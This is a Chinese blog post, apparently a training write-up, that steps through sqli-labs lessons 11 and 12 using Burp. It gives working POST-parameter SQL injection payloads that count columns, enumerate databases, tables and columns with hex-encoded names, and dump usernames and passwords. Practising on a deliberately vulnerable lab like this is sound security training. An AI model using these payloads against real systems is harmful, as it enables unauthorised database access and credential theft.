码迷,mamicode.com
首页 > 数据库 > 详细

sqli lab 11-12

时间:2020-01-22 23:57:45      阅读:75      评论:0      收藏:0      [点我收藏+]

标签:username   复制   str   --   column   orm   col   mic   BMI   


查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema=‘security‘;
查列: select column_name from information_schema.columns where table_name=‘users‘;
查字段: select username,password from security.users;

 

less11

技术图片

 

 

技术图片

 

 

 

 

 

打开burp 抓包软件  之前打开手动配置代理

技术图片

 

 

技术图片

 

复制username和password

 技术图片

 

 复制粘贴  执行

技术图片

 

 执行后  登录成功

 加一个单引号 再次执行  出现错误

技术图片

 

 

 构造出

技术图片

 

 在password处验证

技术图片

 
猜列数


uname=a‘ order by 3#&passwd=a &submit=Submit
或者是使用 uname=a&passwd=a’ order by 2# &submit=Submit同样可以进行判断,最后得出一共有两列。

 

3有返回的错误 2没有 所以得出有俩列
技术图片

 

 技术图片

 

 uname=a&passwd=a‘ union select 1,2 #&submit=Submit  明确有俩列

技术图片

 

 

 

爆库:uname=a&passwd=a‘ union select 1,(select group_concat(schema_name)from information_schema.schemata) #&submit=Submit

 

 技术图片

 

 

查看当前数据库:uname=a&passwd=a‘ union select 1,database() #&submit=Submit

技术图片

 

 uname=a&passwd=a‘ union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479) #&submit=Submit

 

security -->  0x7365637572697479

 

 技术图片

 

获取users表中的字段内容:uname=a&passwd=a‘ union select 1,(select group_concat(column_name)from information_schema.columns where table_name=0x7573657273) #&submit=Submit

 

users-->7573657273

 技术图片

 

 

less-12

第12关与11关基本完全一致,只有数据包裹的格式不同,变成了(“a”),其他步骤完全一样,所以这里放一下最后的结果语句:

uname=a&passwd=a") union select 1,(select group_concat(concat_ws(0x2d,username,password))from security.users) #&submit=Submit

0x2d代表-

技术图片

 

 

 

 

sqli lab 11-12

标签:username   复制   str   --   column   orm   col   mic   BMI   

原文地址:https://www.cnblogs.com/xingyuner/p/12229069.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!